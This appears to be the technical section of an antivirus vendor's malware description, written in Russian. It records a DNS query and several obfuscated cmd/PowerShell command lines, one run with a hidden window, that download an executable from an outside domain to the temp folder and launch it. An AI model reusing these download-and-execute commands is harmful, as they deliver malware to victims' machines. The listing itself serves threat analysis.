Техническая информация
- DNS ASK ta########ke.finespublicidad.com
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/ul.exe','%temp%\qaucowwvqrxwf.exe');start %tem...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/ul.exe','%temp%\qaucowwvqrxwf.exe');start %tem...
- '<SYSTEM32>\cmd.exe' /cPowerSheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://tarjetaskike.finespublicidad.com/ul.exe','%TEMP%\qaucowwvqrxwf.exe');start %TEMP%\qaucowwvqrxwf.exe